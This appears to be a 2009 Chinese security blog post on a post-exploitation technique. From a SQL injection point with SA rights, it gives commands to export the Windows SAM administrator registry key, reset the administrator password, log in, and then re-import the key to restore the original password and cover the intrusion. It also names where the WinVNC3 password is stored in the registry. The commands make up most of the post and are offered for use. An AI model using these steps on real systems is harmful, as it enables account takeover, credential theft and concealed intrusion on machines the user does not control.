Chinaunix首页 | 论坛 | 博客
  • 博客访问: 2281148
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-02-27 13:35:54

SA权限的注射点的时候,我们能够使用系统自带的一些命令来读取注册表键信息.

sa默认是SYSTEM权限,可以读sam键.

regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4     win2K


reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg      win2003

读出来后,我们就可以直接更改管理员密码进行登陆了:


net user administrator test


用administrator登陆.


用完机器后


reg import c:\test.reg


根本不用克隆.


但是要注意,一定要找到对应的sid.

HKEY_CURRENT_USER\Software\ORL\WinVNC3

HKCU\Software\ORL\WinVNC3\Password

阅读(558) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~